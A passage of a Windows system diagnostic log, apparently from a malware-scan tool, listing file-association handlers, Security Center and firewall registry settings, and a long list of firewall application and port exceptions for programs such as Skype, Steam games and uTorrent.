batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\SysWow64\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
https [open] -- "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -osint -url "%1" (Mozilla Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== System Restore Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
 
========== Firewall Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{039BCB32-39CB-433A-9CD0-0DFB609D6ED6}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{1A4687F1-53C4-4E34-B6C1-90ABF109A2C8}" = lport=138 | protocol=17 | dir=in | app=system |
"{1C07F9B2-EE44-4FB4-8C61-91A31E419B85}" = lport=137 | protocol=17 | dir=in | app=system |
"{26C4556C-BD6E-4055-B857-05B5E8F17A49}" = rport=80 | protocol=6 | dir=in | app=c:\program files (x86)\vmware\vmware player\vmware-authd.exe |
"{283B3C46-8F73-4F5C-96A1-8EE59418985D}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{28794443-1330-4748-B080-9F934F4BDAD9}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{29C74A3C-EEDE-478D-BD15-D0788F70024E}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{2BEBBBBA-0D4E-41B1-8D18-2FD65B6AB809}" = rport=138 | protocol=17 | dir=out | app=system |
"{35B64B2F-E85C-424F-94EF-676F20BBFA9C}" = rport=10243 | protocol=6 | dir=out | app=system |
"{4226AAA6-5F6A-4A61-A05B-5CAA689F8A84}" = lport=445 | protocol=6 | dir=in | app=system |
"{52746449-3440-4CB6-B2F0-77A909D82673}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{52FC10D0-E592-49AD-9481-CF200CC76159}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{548B6479-700E-4602-B033-F69583AC43B9}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{6BA39642-E446-45A9-8F8D-CB32C74C1C13}" = rport=139 | protocol=6 | dir=out | app=system |
"{7BFABC5E-E83A-4F78-89F1-678963B6CB25}" = lport=10243 | protocol=6 | dir=in | app=system |
"{85352694-3D40-4EC4-93CE-C35099A30474}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{9CAEB3E8-35B2-469B-9117-A1AC4483E040}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{A0247EFB-E19D-4560-A192-F0DDD1F8A9EC}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe |
"{AD040466-9221-4EAD-9275-B527D1DC2405}" = rport=445 | protocol=6 | dir=out | app=system |
"{B1A9E528-BD37-426C-B9B9-CC782760F4D5}" = lport=3306 | protocol=6 | dir=in | name=mysql server |
"{CCF33AFD-03C8-4B4A-A1CE-9C2303FD80EF}" = lport=2869 | protocol=6 | dir=in | app=system |
"{D4EA3601-618D-4CB5-A271-5BDD157C00B1}" = lport=2869 | protocol=6 | dir=in | app=system |
"{D968CEF9-A1AD-4A10-A2F2-085C3BDCD37E}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{E5E4CF31-8556-40A3-8481-9B71C05BDCF7}" = rport=137 | protocol=17 | dir=out | app=system |
"{EBD2A4DC-34A3-4615-B941-3D869148C68D}" = rport=80 | protocol=6 | dir=in | app=c:\program files (x86)\vmware\vmware player\vmware-authd.exe |
"{F4E89886-314F-4281-A9E0-520039F9BAE0}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{F6F586EA-B11B-43E9-ACD3-9DBFD7D890B1}" = lport=139 | protocol=6 | dir=in | app=system |
"{FF04292F-7CE2-463E-B4D5-C99A36E91AA7}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{001F8847-CF5B-4EFE-B943-76E6FD6621A8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{011D3EEE-0DAC-4AD5-B947-369180F3C7FC}" = protocol=6 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\patch_server.exe |
"{0217A820-4F8D-4990-8FE1-181F12FA7941}" = protocol=17 | dir=in | app=c:\program files (x86)\premiumsoft\navicat lite\navicat.exe |
"{037FD231-A5AE-4933-B75A-50BFDC2EEB1E}" = protocol=17 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivlauncher.exe |
"{0469FCB8-22B2-4D03-9D8E-6F300CDBBBEE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{058C155F-B565-4144-AD6B-CB87395D5D59}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{05EA8067-2C26-4102-A082-0BDA12F9B9E8}" = protocol=6 | dir=in | app=c:\program files (x86)\autodesk\backburner\manager.exe |
"{07390F66-C36E-43F8-B107-491C8F8B9B9E}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{086087D5-6817-4A13-9182-21424F842D56}" = protocol=17 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{08887312-47D0-4E4A-BE32-0228C8120AA7}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{08BB7268-61C7-4621-8710-3866D2DC461F}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{08C9CE60-C856-4855-B9E1-B8DDD81E9299}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{08E33CBA-E185-44ED-987B-6F63A7918E86}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{0963736A-E070-45A7-9D35-622799C3DFE5}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{0C94AF81-A8A9-4E25-A4EB-CCC5DA313C2F}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\creationkit.exe |
"{0E410A23-0DB9-495B-8BA1-8A40A46D9086}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{0EC9F9BF-09E3-483C-B51A-CE8F8E6908FB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{0F655195-69F6-44B1-A8F0-8DBD239D66F3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{10824EFF-4D78-494E-B95C-629CF0F2DE4D}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\skyrimlauncher.exe |
"{10A40D1A-996A-4C3B-A7CF-FEC0486EA04B}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{11058164-764D-4592-93A0-BFA09C4A20EF}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{117AED4A-EF32-4AC0-B682-5BDF6968C79E}" = protocol=6 | dir=in | app=c:\program files (x86)\aim\aim.exe |
"{11B61834-E8FE-4B8B-9B29-04DFCA626B0A}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{11CFE7B5-F412-4453-97F7-48DA75DDE9BF}" = dir=in | app=c:\program files (x86)\common files\apple\apple application support\webkit2webprocess.exe |
"{1448FCD7-A6B3-4BBD-8E09-51B2AEB6B09A}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\final fantasy vii\ff7_launcher.exe |
"{14A7D041-8A5C-4C48-A105-C49EE329599A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{152AB14E-9D4B-46DA-A8FA-CC0C1288A089}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{16D7FF09-685E-4B30-AE8F-438E81103936}" = protocol=6 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{17A6827E-DE61-45CA-9581-2C6DBDAF8E17}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{17F93C0A-BDD1-4B0A-9CAB-C99E2621C879}" = dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{1A79B073-C4F0-46AC-92DE-54E9630B16A2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{1B6D72B7-9AD6-4B64-BC6F-CB2C3430FE4D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{1BB73985-7642-4358-844C-A7B48072662E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{1C291BD7-BEDE-4776-B39E-654E46D625FD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{1CBF9CA8-3F9C-4703-AEE7-0903526C1EAF}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{1CE8749D-B8A8-43BD-8B41-826C2B1EF98A}" = protocol=6 | dir=in | app=c:\program files (x86)\premiumsoft\navicat lite\navicat.exe |
"{1D022049-0A2A-4168-AEF1-23B64A21C884}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\final fantasy vii\ff7_launcher.exe |
"{1D407E64-06AF-4950-A275-8C67A43F74B0}" = protocol=17 | dir=in | app=c:\program files (x86)\yahoo!\messenger\yahoomessenger.exe |
"{1DC2D09E-D623-470D-A3FC-A2F38B869DDF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{1DECC675-23D3-497A-B6B8-0711F72B6CE1}" = protocol=6 | dir=in | app=c:\program files (x86)\utorrent\utorrent.exe |
"{1F06F43F-A71A-419C-AA09-6E49EAA52043}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv inauguration station\saintsrowiv_inaugurationstation.exe |
"{1FA7BCCE-5FC9-4986-800A-0121E85183CD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{1FBBF826-C9E9-4D7E-AAB7-56F72DC74783}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{20291405-DFDE-4C54-826F-594853E69515}" = protocol=6 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\login_server.exe |
"{208C9565-8E8B-49E9-957F-48E5B50BCA42}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2195FE5B-DE5C-4384-8DEA-8ECF84B07384}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{22A1D8BB-6D24-4BE1-8401-53EF3BF8E59C}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{22E70E39-F896-47FE-A07D-E6F2C14D4387}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{2304A6A9-29AA-40D5-A80F-84F29F1DE26F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2342A450-6EC8-4759-B9B6-D8EDC2BBC98D}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{238BB2C8-7000-4F1A-8ABD-87193CE9AA98}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{23BE32CD-0785-4045-A046-AFB6602015DC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{24FC6023-6955-45B2-8D0B-2856F31D1DCB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{255CDFB0-D358-464D-A445-5A32D4A408C5}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{2670975D-C858-4E5F-A54A-D69E98FA90CD}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{27167C7E-EB0A-4962-AEB2-02589F04CA26}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{271DD108-8A27-404C-8D54-8D1CADD61D78}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\oblivion\oblivionlauncher.exe |
"{273B5D00-D4B8-4912-9444-AE7C334DA200}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{28482C2B-6F10-4252-96D6-468C78C5A3C6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{28714C02-A039-4C92-A549-05473131B5A6}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{2AAE5743-136B-49E5-ADFB-C0EDD95EE928}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2ABF6693-E26C-423E-B532-823BC100D9E2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{2B68A169-5429-4FF5-B8F3-36AF01F0651D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2E0338AD-AB4A-4558-8F63-399877A6316B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2E479586-C304-4E62-88AF-941683AF82D8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2ED2E180-02ED-4865-9AD9-B83B0C1AEE99}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{32D574BA-124B-470E-AC3A-D909B1C7FE7C}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{34257C36-B7EA-4649-A09E-703199D53F77}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{34DC8AEE-9144-4623-9CBB-9D116D391445}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{35A1830D-5634-4BAD-AE85-5CE3D294EF22}" = protocol=6 | dir=in | app=e:\program files\utorrent\utorrent.exe |
"{36037343-8A2F-4271-A150-4C718D8C9339}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{3673AE70-A569-4366-A0FC-A7F68A48E328}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{3715E1C8-91A8-4C2D-A3BD-EF89C123EF67}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{3737464B-2509-486D-85EA-C8BF76D6C914}" = protocol=17 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivboot.exe |
"{37D19E95-AF60-4502-9987-F2BD597192DB}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{383F6D61-9594-4CF6-B36B-E07B0FB55620}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{38FAF647-DA6F-47E5-B768-99996DA5D08D}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{3A7F2EF6-DBBE-4935-BC45-6A41A125A7A2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{3BCA5503-92C2-488A-A7F0-9025DBF31219}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{3C4D7854-5EE7-42C6-9057-D39BAD359345}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{3C83FD23-82B6-44B2-8DCA-23147CF02E6F}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{3CE7DE8D-621F-42B3-944C-22C9EE4E7320}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{3D7BDECD-DEC5-4423-9C4A-8E8A44367875}" = protocol=17 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv\ffxivboot.exe |
"{3DEA47B7-04A3-484E-8A32-98C7085F14BF}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\bin_ship\daupdatersvc.service.exe |
"{40C4C479-C54A-49B1-991D-6517241BC07E}" = protocol=58 | dir=out | name=@iphlpsvc.dll,-503 |
"{40CB1944-D578-41B1-AF17-1CA5A0B241CB}" = protocol=17 | dir=in | app=c:\program files\autodesk\3ds max 2012\3dsmax.exe |
"{423C6806-1F76-488F-918C-F967BBEE2733}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{43BC2FF4-BE11-4922-90E0-91DE0535F1B6}" = protocol=17 | dir=in | app=c:\program files\autodesk\3ds max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe |
"{442B014E-5CEB-4B73-9954-2DED9F573015}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{44FDF048-6BD8-4C26-A92B-97C407041FAB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{45137FB3-AFF6-49F8-8830-9E9227C235AC}" = protocol=17 | dir=in | app=c:\program files (x86)\autodesk\backburner\monitor.exe |
"{45DF360D-AF9B-4714-A9C5-2C4A472B55BE}" = protocol=17 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\patch_server.exe |
"{46C9410D-A455-4F34-A8F1-D9447A3BA1BE}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |
"{477EBAEC-4379-4F05-A03F-3D064923AD97}" = protocol=17 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\login_server.exe |
"{489E9420-5E45-4491-BB41-17E85D3189E3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{4900F3A1-4E34-4130-8C04-92CE6BA640B8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{4902E522-6184-4194-88F1-D052FD22E459}" = protocol=6 | dir=in | app=c:\program files\autodesk\3ds max 2012\3dsmax.exe |
"{497036C1-CA32-4565-8D4D-1E9A3E152B29}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv inauguration station\saintsrowiv_inaugurationstation.exe |
"{4B3FA4DD-00A5-4AC9-8AD0-B9536D797755}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{4D09A62B-19B7-47DF-971D-89A00F7C2EB1}" = protocol=17 | dir=in | app=e:\program files\utorrent\utorrent.exe |
"{4D0B55C7-E82B-4351-B5E7-F85ACC448389}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{4D1E0F01-7D57-45D9-8012-0909AD3ED0E8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{4DF738FD-461D-48DD-BB0D-87DC232BC6D0}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{4EE5EC34-E407-44D8-9E84-DE39D8562D77}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{5049EF67-05F7-485D-8DB7-24A2DFA90034}" = protocol=6 | dir=in | app=c:\program files (x86)\utorrent\utorrent.exe |
"{50A14B5D-8900-4F0D-A513-7F4F5FF220AD}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{51D47280-F010-4E7D-803C-002984487447}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{520021C9-BA0C-47B6-BD29-440A07D112C0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{5218A350-45A4-44E1-8C38-631B3DA29F5D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{5252598C-29C5-4A7C-99B2-400342D6CDD6}" = protocol=6 | dir=in | app=e:\program files\utorrent\utorrent.exe |
"{53774FED-59FD-43CA-B70D-7CEE240A714D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{53850452-F70F-4FF8-8BCB-D57A0D3AF8DC}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{57DA09F8-5B21-4243-8A0E-D7C9140A07B6}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{583CA67E-5EDF-4B62-B3DA-7E266122070B}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{58E94A64-B27D-4A98-B234-604991367DA7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{59157E39-74BF-4943-8536-9D84B473FC66}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{5925AEB0-52F2-4391-B742-756C19E5894C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{59C2DE65-E0E3-4462-B775-DB67E52177DC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{5B0F6A4A-4DA1-4169-89DA-71AF644A58D9}" = protocol=17 | dir=in | app=c:\program files (x86)\utorrent\utorrent.exe |
"{5BFDBC72-3D4B-4816-B792-3FDB1BCEFB2F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{5D13D12C-1587-49F2-913F-5A6E819640E1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{5DD8A0F2-9D53-420C-91F9-CF2875B925CF}" = protocol=17 | dir=in | app=c:\program files (x86)\autodesk\backburner\manager.exe |
"{5E222CBD-3138-4BD9-BE66-5DC1A7043BA9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{60427F79-EA05-411D-BD7E-663E8377D791}" = protocol=6 | dir=in | app=c:\program files\autodesk\3ds max 2012\mentalimages\satellite\raysat_3dsmax2012_64.exe |
"{64026244-91A6-45D7-AF73-DFB73368CD9F}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{64BD0EBF-5DFF-407A-8C52-D41F95A6E5DD}" = protocol=6 | dir=in | app=c:\program files\autodesk\3ds max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe |
"{64DD9C12-6CDD-4330-961F-605DC9945F3C}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\morrowind\morrowind launcher.exe |
"{65F59484-B821-442F-B3E7-035C9DFFF980}" = protocol=6 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivlauncher.exe |
"{685A1F70-4E48-4214-9436-E64301CDF485}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{6990D3A9-82F4-4A36-9609-BB52967D2ABE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{6A390D46-308F-4CE8-87C1-2454B6FADDE1}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{6AE7523F-5866-4835-A18D-4F09A7E2F10D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{6AFF00F3-4163-4203-AE83-CE0580A4F14F}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{6BF3E474-2159-44A0-A508-84C64CF84309}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{6D0065DD-BE82-41C2-8441-F0EC62FA1E44}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{6D96B861-DD13-4FEF-9324-0B68A77500D0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{6F0F638E-EEA6-4B38-8CBB-71115CF08ED6}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{6F27C037-6D2F-416A-8F8A-7F227C6A98B2}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{6FAE5C7F-82A0-4EB0-ABEE-F6F93C3FE39F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{70E3B8A3-3150-4BDE-9B99-80C5CB2E7FB4}" = protocol=6 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{719A2B3B-5215-4071-B383-469DE03A802B}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\bin_ship\daupdatersvc.service.exe |
"{735F854E-7778-486F-B68C-0682675D42EE}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{73EA02B3-F07B-44D0-BB8C-19D1F25C3301}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{74A9C2F1-C739-44A3-98E6-9B9207DC31E4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{750CD231-15DE-41B0-B29C-8E20E8F09135}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{7648AC62-29AC-40C6-963B-EB1407C1D786}" = protocol=17 | dir=in | app=c:\program files (x86)\autodesk\backburner\server.exe |
"{7655C723-F3CD-429A-BE9F-2E871C845886}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{770C3BB4-C608-475D-B5AA-F94D3CBAB4ED}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{78BD6241-685E-48CA-A9B5-64B5CBE94F2C}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{794B8D68-DAFE-4C18-8BC1-F2EBEC9B252C}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{79C460C9-0D6C-46B7-ADEA-4F0384DA47D8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{7A4DE317-6804-4A30-8FFF-7EB91063DCDA}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{7B957A14-98A7-42F7-898B-57E6DCFB38FB}" = protocol=6 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivboot.exe |
"{7BBF3330-9732-4FE2-A129-4B1E1100A138}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{7BD9FD5F-80C3-465A-B16F-F9F9F5F488F0}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{7C0CE0C4-8112-4FC1-8E12-3D839F63612D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{7CE9CA3F-B9C6-43DD-B03A-0DBF44BEEDB5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{7EAB3745-ACCE-4530-BB22-73951EFA58D3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{7EBEDC25-267D-450E-A18A-735FE28256FE}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{7EC6C912-CD91-41A9-BE7C-41BBA1ADA78D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{7F265411-609D-42D4-B8D0-B4F189546C52}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{7F6205F8-ABF3-4539-80B3-227608E033F8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{7FCC1CEA-A31E-4938-B883-5DE3C68E0D3E}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{80A01642-0650-4EAE-8653-407E8DF0C513}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv\saintsrowiv.exe |
